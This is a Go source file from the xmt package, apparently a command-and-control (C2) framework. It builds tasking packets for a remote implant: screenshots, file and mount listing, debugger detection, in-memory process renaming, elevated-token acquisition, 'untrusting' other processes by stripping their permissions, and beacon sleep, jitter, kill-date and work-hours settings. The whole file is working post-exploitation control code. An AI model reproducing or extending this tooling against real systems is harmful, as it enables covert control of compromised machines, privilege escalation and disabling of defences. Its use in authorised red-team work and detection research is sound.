github.com/iDigitalFlame/xmt@v0.5.4/c2/task/v_task.go (about) 1 //go:build !implant 2 // +build !implant 3 4 // Copyright (C) 2020 - 2023 iDigitalFlame 5 // 6 // This program is free software: you can redistribute it and/or modify 7 // it under the terms of the GNU General Public License as published by 8 // the Free Software Foundation, either version 3 of the License, or 9 // any later version. 10 // 11 // This program is distributed in the hope that it will be useful, 12 // but WITHOUT ANY WARRANTY; without even the implied warranty of 13 // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 // GNU General Public License for more details. 15 // 16 // You should have received a copy of the GNU General Public License 17 // along with this program. If not, see <https://www.gnu.org/licenses/>. 18 // 19 20 package task 21 22 import ( 23 "time" 24 25 "github.com/iDigitalFlame/xmt/cmd/filter" 26 "github.com/iDigitalFlame/xmt/com" 27 ) 28 29 // Pwd returns a print current directory Packet. This can be used to instruct 30 // the client to return a string value that contains the current working 31 // directory. 32 // 33 // C2 Details: 34 // 35 // ID: MvPwd 36 // 37 // Input: 38 // <none> 39 // Output: 40 // string // Working Dir 41 func Pwd() *com.Packet { 42 return &com.Packet{ID: MvPwd} 43 } 44 45 // Mounts returns a list mounted drives Packet. This can be used to instruct 46 // the client to return a string list of all the mount points on the host device. 47 // 48 // C2 Details: 49 // 50 // ID: MvMounts 51 // 52 // Input: 53 // <none> 54 // Output: 55 // []string // Mount Paths List 56 func Mounts() *com.Packet { 57 return &com.Packet{ID: MvMounts} 58 } 59 60 // Refresh returns a refresh Packet. This will instruct the client to re-update 61 // it's internal Device storage and return the new result. This can be used to 62 // detect new network interfaces added/removed and changes to hostname/user 63 // status. 64 // 65 // This is NOT needed after a Migration, as this happens automatically. 66 // 67 // C2 Details: 68 // 69 // ID: MvRefresh 70 // 71 // Input: 72 // <none> 73 // Output: 74 // Machine // Updated device details 75 func Refresh() *com.Packet { 76 return &com.Packet{ID: MvRefresh} 77 } 78 79 // ScreenShot returns a screenshot Packet. This will instruct the client to 80 // attempt to get a screenshot of all the current active desktops on the host. 81 // If successful, the returned data is a binary blob of the resulting image, 82 // encoded in the PNG image format. 83 // 84 // Always returns 'ErrNoWindows' on non-Windows devices. 85 // 86 // C2 Details: 87 // 88 // ID: TVScreenShot 89 // 90 // Input: 91 // <none> 92 // Output: 93 // []byte // Data 94 func ScreenShot() *com.Packet { 95 return &com.Packet{ID: TvScreenShot} 96 } 97 98 // Ls returns a file list Packet. This can be used to instruct the client 99 // to return a string and bool list of the files in the directory specified. 100 // 101 // If 'd' is empty, the current working directory "." is used. 102 // 103 // The source path may contain environment variables that will be resolved 104 // during runtime. 105 // 106 // C2 Details: 107 // 108 // ID: MvList 109 // 110 // Input: 111 // string // Directory 112 // Output: 113 // uint32 // Count 114 // []File struct { // List of Files 115 // string // Name 116 // int32 // Mode 117 // uint64 // Size 118 // int64 // Modtime 119 // } 120 func Ls(d string) *com.Packet { 121 n := &com.Packet{ID: MvList} 122 n.WriteString(d) 123 return n 124 } 125 126 // IsDebugged returns a check debugger status Packet. This can be used to instruct 127 // the client to return a boolean value determine if it is currently attached or 128 // being run by a debugger. 129 // 130 // C2 Details: 131 // 132 // ID: MvCheckDebug 133 // 134 // Input: 135 // <none> 136 // Output: 137 // bool // True if being debugged, false otherwise 138 func IsDebugged() *com.Packet { 139 return &com.Packet{ID: MvCheckDebug} 140 } 141 142 // Jitter returns a set Session jitter Packet. This can be used to instruct the 143 // client to update it's jitter value to the specified 0-100 percentage. 144 // 145 // Anything greater than 100 will be capped to 100 and anything less than zero 146 // (except -1) will be set to zero. Values of -1 are ignored. This setting will 147 // NOT override the Sleep setting. 148 // 149 // C2 Details: 150 // 151 // ID: MvTime 152 // 153 // Input: 154 // uint8 // Always 0 for this Task 155 // int8 // Jitter 156 // uint64 // Always 0 for this Task 157 // Output: 158 // uint8 // Jitter 159 // uint64 // Sleep 160 // uint64 // Kill Date 161 // WorkHours { // Work Hours 162 // uint8 // Day 163 // uint8 // Start Hour 164 // uint8 // Start Min 165 // uint8 // End Hour 166 // uint8 // End Min 167 // } 168 func Jitter(j int) *com.Packet { 169 return Duration(0, j) 170 } 171 172 // Cwd returns a change directory Packet. This can be used to instruct the 173 // client to change from its current working directory to the directory 174 // specified. 175 // 176 // Empty or invalid directory entries will return an error. 177 // 178 // The source path may contain environment variables that will be resolved 179 // during runtime. 180 // 181 // C2 Details: 182 // 183 // ID: MvCwd 184 // 185 // Input: 186 // string // Directory 187 // Output: 188 // <none> 189 func Cwd(d string) *com.Packet { 190 n := &com.Packet{ID: MvCwd} 191 n.WriteString(d) 192 return n 193 } 194 195 // Profile returns an update profile Packet. This can be used to instruct the 196 // client to set its profile to the raw Profile bytes supplied. 197 // 198 // IT IS RECOMMENDED TO USE THE 'Session.SetProfile' CALL INSTEAD TO PREVENT DE-SYNC 199 // ISSUES BETWEEN SERVER AND CLIENT. HERE ONLY FOR USAGE IN SCRIPTS. 200 // 201 // C2 Details: 202 // 203 // ID: MvProfile 204 // 205 // Input: 206 // []byte // Profile 207 // Output: 208 // <none> 209 func Profile(b []byte) *com.Packet { 210 n := &com.Packet{ID: MvProfile} 211 n.WriteBytes(b) 212 return n 213 } 214 215 // KillDate returns a set Session kill date Packet. This can be used to instruct 216 // the client to update it's kill date to the specified date value. 217 // 218 // If the time supplied is the empty time struct, this will clear any Kill Date 219 // if it exists. 220 // 221 // C2 Details: 222 // 223 // ID: MvTime 224 // 225 // Input: 226 // uint8 // Always 1 for this Task 227 // uint64 // Unix time 228 // Output: 229 // uint8 // Jitter 230 // uint64 // Sleep 231 // uint64 // Kill Date 232 // WorkHours { // Work Hours 233 // uint8 // Day 234 // uint8 // Start Hour 235 // uint8 // Start Min 236 // uint8 // End Hour 237 // uint8 // End Min 238 // } 239 func KillDate(t time.Time) *com.Packet { 240 n := &com.Packet{ID: MvTime} 241 if n.WriteUint8(1); t.IsZero() { 242 n.WriteUint64(0) 243 } else { 244 n.WriteInt64(t.Unix()) 245 } 246 return n 247 } 248 249 // ProcessName returns a process name change Packet. This can be used to instruct 250 // the client to change from its current in-memory name to the specified string. 251 // 252 // C2 Details: 253 // 254 // ID: TvRename 255 // 256 // Input: 257 // string // New Process Name 258 // Output: 259 // <none> 260 func ProcessName(s string) *com.Packet { 261 n := &com.Packet{ID: TvRename} 262 n.WriteString(s) 263 return n 264 } 265 266 // Wait returns a wait -n- sleep Packet. This can be used to instruct to the 267 // client to pause processing for the specified duration. 268 // 269 // This Task only has an affect during Scripts as most operations are threaded. 270 // 271 // If the time is less than or equal to zero, the task will become a NOP. 272 // 273 // C2 Details: 274 // 275 // ID: TvWait 276 // 277 // Input: 278 // uint64 // Wait duration 279 // Output: 280 // <none> 281 func Wait(d time.Duration) *com.Packet { 282 n := &com.Packet{ID: TvWait} 283 n.WriteUint64(uint64(d)) 284 return n 285 } 286 287 // Sleep returns a set Session sleep Packet. This can be used to instruct the 288 // client to update it's sleep value to the specified duration. 289 // 290 // Anything less than or equal to zero is ignored! This setting will NOT override 291 // the Jitter setting. 292 // 293 // C2 Details: 294 // 295 // ID: MvTime 296 // 297 // Input: 298 // uint8 // Always 0 for this Task 299 // int8 // Always -1 for this Task 300 // uint64 // Sleep 301 // Output: 302 // uint8 // Jitter 303 // uint64 // Sleep 304 // uint64 // Kill Date 305 // WorkHours { // Work Hours 306 // uint8 // Day 307 // uint8 // Start Hour 308 // uint8 // Start Min 309 // uint8 // End Hour 310 // uint8 // End Min 311 // } 312 func Sleep(d time.Duration) *com.Packet { 313 return Duration(d, -1) 314 } 315 316 // UnTrust returns an Untrust Packet. This will instruct the client to use the 317 // provided Filter to attempt to "Untrust" the targeted process by removing all 318 // of its permissions and setting its integrity level to "Untrusted". 319 // 320 // Always returns 'ErrNoWindows' on non-Windows devices. 321 // 322 // C2 Details: 323 // 324 // ID: TvUnTrust 325 // 326 // Input: 327 // Filter struct { // Filter 328 // bool // Filter Status 329 // uint32 // PID 330 // bool // Fallback 331 // uint8 // Session 332 // uint8 // Elevated 333 // []string // Exclude 334 // []string // Include 335 // } 336 // Output: 337 // <none> 338 func UnTrust(f *filter.Filter) *com.Packet { 339 n := &com.Packet{ID: TvUnTrust} 340 f.MarshalStream(n) 341 return n 342 } 343 344 // Elevate returns an elevate Packet. This will instruct the client to use the 345 // provided Filter to attempt to get a Token handle to an elevated process. If 346 // the Filter is nil, then the client will attempt at any elevated process. 347 // 348 // Always returns 'ErrNoWindows' on non-Windows devices. 349 // 350 // C2 Details: 351 // 352 // ID: TvElevate 353 // 354 // Input: 355 // Filter struct { // Filter 356 // bool // Filter Status 357 // uint32 // PID 358 // bool // Fallback 359 // uint8 // Session 360 // uint8 // Elevated 361 // []string // Exclude 362 // []string // Include 363 // } 364 // Output: 365 // <none> 366 func Elevate(f *filter.Filter) *com.Packet { 367 n := &com.Packet{ID: TvElevate} 368 f.MarshalStream(n) 369 return n 370 } 371 372 // Duration returns a set Session sleep and/or jitter Packet. This can be used 373 // to instruct the client to update it's sleep and jitters value to the specified 374 // duration and 0-100 percentage values if they are not unset. (-1 for Jitter, 375 // anything <=0 for Sleep). 376 // 377 // For Sleep, anything less than or equal to zero is ignored! 378 // 379 // For Jitter, anything greater than 100 will be capped to 100 and anything less 380 // than zero (except -1) will be set to zero. Values of -1 are ignored. 381 // 382 // C2 Details: 383 // 384 // ID: MvTime 385 // 386 // Input: 387 // uint8 // Always 0 for this Task 388 // int8 // Jitter 389 // uint64 // Sleep 390 // Output: 391 // uint8 // Jitter 392 // uint64 // Sleep 393 // uint64 // Kill Date 394 // WorkHours { // Work Hours 395 // uint8 // Day 396 // uint8 // Start Hour 397 // uint8 // Start Min 398 // uint8 // End Hour 399 // uint8 // End Min 400 // } 401 func Duration(d time.Duration, j int) *com.Packet { 402 n := &com.Packet{ID: MvTime} 403 n.WriteUint16(uint16(j & 0xFF)) 404 n.WriteInt64(int64(d)) 405 return n 406 } 407 408 // WorkHours returns a set Session Work Hours Packet. This can be used to instruct 409 // the client to update it's working hours to the supplied work hours values as 410 // uint8 values. 411 // 412 // Days is a bitmask of the days that the WorkHours applies to The bit values are 413 // 0 (Sunday) to 7 (Saturday). Values 0, 255 and anything over 126 are treated 414 // as all days selected. 415 // 416 // If all the supplied values are zero, this will clear any previous Work Hours 417 // set. 418 // 419 // C2 Details: 420 // 421 // ID: MvTime 422 // 423 // Input: 424 // uint8 // Always 2 for this Task 425 // uint64 // Unix time 426 // Output: 427 // uint8 // Jitter 428 // uint64 // Sleep 429 // uint64 // Kill Date 430 // WorkHours { // Work Hours 431 // uint8 // Day 432 // uint8 // Start Hour 433 // uint8 // Start Min 434 // uint8 // End Hour 435 // uint8 // End Min 436 // } 437 func WorkHours(day, startHour, startMin, endHour, endMin uint8) *com.Packet { 438 n := &com.Packet{ID: MvTime} 439 n.WriteUint16(0x200 | uint16(day&0xFF)) 440 n.WriteUint8(startHour) 441 n.WriteUint8(startMin) 442 n.WriteUint8(endHour) 443 n.WriteUint8(endMin) 444 return n 445 }